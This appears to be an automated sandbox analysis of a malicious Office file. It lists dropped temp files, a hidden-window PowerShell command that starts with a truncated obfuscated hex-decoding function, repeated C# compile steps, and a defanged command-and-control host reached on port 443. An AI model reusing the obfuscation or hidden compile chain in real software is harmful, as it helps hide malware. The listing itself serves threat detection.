Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function q3f2d {param($hd7b97)$e266f5c='d8be5';$s1f83='';for ($i=0; $i -lt $hd7b97.length;$i+=2){$b3a3712=[convert]::ToByte($hd7b97.Substring($i,2),16);$s1f83+=[char]($b3a...
- %TEMP%\fsqvumvq.0.cs
- %TEMP%\a9cfd1xs.dll
- %TEMP%\resc9ac.tmp
- %TEMP%\cscc99b.tmp
- %TEMP%\a9cfd1xs.out
- %TEMP%\a9cfd1xs.cmdline
- %TEMP%\a9cfd1xs.0.cs
- %TEMP%\h8rfbzle.dll
- %TEMP%\resa952.tmp
- %TEMP%\csca932.tmp
- %TEMP%\h8rfbzle.out
- %TEMP%\h8rfbzle.cmdline
- %TEMP%\h8rfbzle.0.cs
- %TEMP%\dvj5r7cj.dll
- %TEMP%\res97be.tmp
- %TEMP%\csc97ae.tmp
- %TEMP%\dvj5r7cj.out
- %TEMP%\dvj5r7cj.cmdline
- %TEMP%\dvj5r7cj.0.cs
- %TEMP%\jab02i3f.dll
- %TEMP%\ufp7tfi4.0.cs
- %TEMP%\ufp7tfi4.out
- %TEMP%\btwoglqd.dll
- %TEMP%\cscdc87.tmp
- %TEMP%\res2a89.tmp
- %TEMP%\csc2a78.tmp
- %TEMP%\btwoglqd.out
- %TEMP%\btwoglqd.cmdline
- %TEMP%\btwoglqd.0.cs
- %TEMP%\czjjaqis.dll
- %TEMP%\resbc6.tmp
- %TEMP%\cscbc5.tmp
- %TEMP%\czjjaqis.out
- %TEMP%\czjjaqis.cmdline
- %TEMP%\czjjaqis.0.cs
- %TEMP%\ialv_p2o.dll
- %TEMP%\resf85d.tmp
- %TEMP%\cscf84c.tmp
- %TEMP%\ialv_p2o.out
- %TEMP%\ialv_p2o.cmdline
- %TEMP%\ialv_p2o.0.cs
- %TEMP%\ufp7tfi4.dll
- %TEMP%\resdc97.tmp
- %TEMP%\res7be9.tmp
- %TEMP%\ufp7tfi4.cmdline
- %TEMP%\csc7bc9.tmp
- %TEMP%\csc62c.tmp
- %TEMP%\l15c0j0z.cmdline
- %TEMP%\l15c0j0z.0.cs
- %TEMP%\lunz9uju.dll
- %TEMP%\resf68d.tmp
- %TEMP%\c6tdcvxt.dll
- %TEMP%\fsqvumvq.dll
- %TEMP%\cscf67c.tmp
- %TEMP%\resefd6.tmp
- %TEMP%\resea39.tmp
- %TEMP%\cscefc5.tmp
- %TEMP%\cscea28.tmp
- %TEMP%\lunz9uju.out
- %TEMP%\lunz9uju.cmdline
- %TEMP%\lunz9uju.0.cs
- %TEMP%\c6tdcvxt.out
- %TEMP%\c6tdcvxt.cmdline
- %TEMP%\c6tdcvxt.0.cs
- %TEMP%\fsqvumvq.out
- %TEMP%\fsqvumvq.cmdline
- %TEMP%\l15c0j0z.out
- %TEMP%\res63c.tmp
- %TEMP%\jab02i3f.cmdline
- %TEMP%\l15c0j0z.dll
- %TEMP%\jab02i3f.0.cs
- %TEMP%\ndaqgenu.dll
- %TEMP%\res66ac.tmp
- %TEMP%\csc669b.tmp
- %TEMP%\ndaqgenu.out
- %TEMP%\ndaqgenu.cmdline
- %TEMP%\ndaqgenu.0.cs
- %TEMP%\oe6yfflf.dll
- %TEMP%\res44cc.tmp
- %TEMP%\csc44bb.tmp
- %TEMP%\oe6yfflf.out
- %TEMP%\oe6yfflf.cmdline
- %TEMP%\oe6yfflf.0.cs
- %TEMP%\pck_glik.dll
- %TEMP%\res1252.tmp
- %TEMP%\csc1242.tmp
- %TEMP%\pck_glik.out
- %TEMP%\pck_glik.cmdline
- %TEMP%\pck_glik.0.cs
- %TEMP%\jab02i3f.out
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{347442be-c988-4445-885f-9d193a8122c6}.tmp
- %TEMP%\resea39.tmp
- %TEMP%\a9cfd1xs.dll
- %TEMP%\a9cfd1xs.cmdline
- %TEMP%\a9cfd1xs.out
- %TEMP%\a9cfd1xs.pdb
- %TEMP%\cscc99b.tmp
- %TEMP%\resc9ac.tmp
- %TEMP%\h8rfbzle.dll
- %TEMP%\h8rfbzle.pdb
- %TEMP%\h8rfbzle.0.cs
- %TEMP%\h8rfbzle.cmdline
- %TEMP%\a9cfd1xs.0.cs
- %TEMP%\h8rfbzle.out
- %TEMP%\resa952.tmp
- %TEMP%\dvj5r7cj.0.cs
- %TEMP%\dvj5r7cj.cmdline
- %TEMP%\dvj5r7cj.pdb
- %TEMP%\dvj5r7cj.dll
- %TEMP%\dvj5r7cj.out
- %TEMP%\csc97ae.tmp
- %TEMP%\res97be.tmp
- %TEMP%\jab02i3f.pdb
- %TEMP%\jab02i3f.out
- %TEMP%\csca932.tmp
- %TEMP%\resdc97.tmp
- %TEMP%\cscdc87.tmp
- %TEMP%\ufp7tfi4.out
- %TEMP%\btwoglqd.cmdline
- %TEMP%\btwoglqd.pdb
- %TEMP%\btwoglqd.out
- %TEMP%\csc2a78.tmp
- %TEMP%\res2a89.tmp
- %TEMP%\czjjaqis.out
- %TEMP%\czjjaqis.0.cs
- %TEMP%\czjjaqis.dll
- %TEMP%\czjjaqis.pdb
- %TEMP%\czjjaqis.cmdline
- %TEMP%\cscbc5.tmp
- %TEMP%\resbc6.tmp
- %TEMP%\ialv_p2o.0.cs
- %TEMP%\ialv_p2o.out
- %TEMP%\ialv_p2o.pdb
- %TEMP%\ialv_p2o.cmdline
- %TEMP%\ialv_p2o.dll
- %TEMP%\cscf84c.tmp
- %TEMP%\resf85d.tmp
- %TEMP%\ufp7tfi4.0.cs
- %TEMP%\ufp7tfi4.pdb
- %TEMP%\ufp7tfi4.cmdline
- %TEMP%\ufp7tfi4.dll
- %TEMP%\jab02i3f.cmdline
- %TEMP%\btwoglqd.dll
- %TEMP%\jab02i3f.dll
- %TEMP%\csc7bc9.tmp
- %TEMP%\csc62c.tmp
- %TEMP%\res63c.tmp
- %TEMP%\c6tdcvxt.0.cs
- %TEMP%\c6tdcvxt.cmdline
- %TEMP%\c6tdcvxt.dll
- %TEMP%\c6tdcvxt.pdb
- %TEMP%\c6tdcvxt.out
- %TEMP%\lunz9uju.0.cs
- %TEMP%\lunz9uju.pdb
- %TEMP%\lunz9uju.out
- %TEMP%\l15c0j0z.cmdline
- %TEMP%\lunz9uju.cmdline
- %TEMP%\fsqvumvq.0.cs
- %TEMP%\fsqvumvq.cmdline
- %TEMP%\fsqvumvq.pdb
- %TEMP%\fsqvumvq.dll
- %TEMP%\fsqvumvq.out
- %TEMP%\cscf67c.tmp
- %TEMP%\resf68d.tmp
- %TEMP%\cscefc5.tmp
- %TEMP%\resefd6.tmp
- %TEMP%\cscea28.tmp
- %TEMP%\lunz9uju.dll
- %TEMP%\l15c0j0z.dll
- %TEMP%\l15c0j0z.0.cs
- %TEMP%\l15c0j0z.out
- %TEMP%\res7be9.tmp
- %TEMP%\ndaqgenu.0.cs
- %TEMP%\ndaqgenu.out
- %TEMP%\ndaqgenu.pdb
- %TEMP%\ndaqgenu.cmdline
- %TEMP%\ndaqgenu.dll
- %TEMP%\csc669b.tmp
- %TEMP%\res66ac.tmp
- %TEMP%\oe6yfflf.pdb
- %TEMP%\oe6yfflf.cmdline
- %TEMP%\oe6yfflf.dll
- %TEMP%\oe6yfflf.out
- %TEMP%\oe6yfflf.0.cs
- %TEMP%\csc44bb.tmp
- %TEMP%\res44cc.tmp
- %TEMP%\pck_glik.dll
- %TEMP%\pck_glik.out
- %TEMP%\pck_glik.0.cs
- %TEMP%\pck_glik.pdb
- %TEMP%\pck_glik.cmdline
- %TEMP%\csc1242.tmp
- %TEMP%\res1252.tmp
- %TEMP%\l15c0j0z.pdb
- %TEMP%\jab02i3f.0.cs
- %TEMP%\btwoglqd.0.cs
- 'th#.#arth.li':443
- DNS ASK th#.#arth.li
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function q3f2d {param($hd7b97)$e266f5c='d8be5';$s1f83='';for ($i=0; $i -lt $hd7b97.length;$i+=2){$b3a3712=[convert]::ToByte($hd7b97.Substring($i,2),16);$s1f83+=[char]($b3a...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESBC6.tmp" "%TEMP%\CSCBC5.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\czjjaqis.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF85D.tmp" "%TEMP%\CSCF84C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ialv_p2o.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDC97.tmp" "%TEMP%\CSCDC87.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ufp7tfi4.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC9AC.tmp" "%TEMP%\CSCC99B.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\a9cfd1xs.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA952.tmp" "%TEMP%\CSCA932.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\h8rfbzle.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES97BE.tmp" "%TEMP%\CSC97AE.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dvj5r7cj.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7BE9.tmp" "%TEMP%\CSC7BC9.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\btwoglqd.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jab02i3f.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ndaqgenu.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES44CC.tmp" "%TEMP%\CSC44BB.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\oe6yfflf.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1252.tmp" "%TEMP%\CSC1242.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pck_glik.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES63C.tmp" "%TEMP%\CSC62C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\l15c0j0z.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF68D.tmp" "%TEMP%\CSCF67C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEFD6.tmp" "%TEMP%\CSCEFC5.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEA39.tmp" "%TEMP%\CSCEA28.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lunz9uju.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\c6tdcvxt.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fsqvumvq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES66AC.tmp" "%TEMP%\CSC669B.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2A89.tmp" "%TEMP%\CSC2A78.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\btwoglqd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESBC6.tmp" "%TEMP%\CSCBC5.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\czjjaqis.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF85D.tmp" "%TEMP%\CSCF84C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ialv_p2o.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDC97.tmp" "%TEMP%\CSCDC87.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ufp7tfi4.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC9AC.tmp" "%TEMP%\CSCC99B.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\a9cfd1xs.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA952.tmp" "%TEMP%\CSCA932.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\h8rfbzle.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES97BE.tmp" "%TEMP%\CSC97AE.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dvj5r7cj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7BE9.tmp" "%TEMP%\CSC7BC9.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jab02i3f.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES66AC.tmp" "%TEMP%\CSC669B.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ndaqgenu.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES44CC.tmp" "%TEMP%\CSC44BB.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\oe6yfflf.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1252.tmp" "%TEMP%\CSC1242.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pck_glik.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES63C.tmp" "%TEMP%\CSC62C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\l15c0j0z.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF68D.tmp" "%TEMP%\CSCF67C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEFD6.tmp" "%TEMP%\CSCEFC5.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEA39.tmp" "%TEMP%\CSCEA28.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lunz9uju.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\c6tdcvxt.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fsqvumvq.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2A89.tmp" "%TEMP%\CSC2A78.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding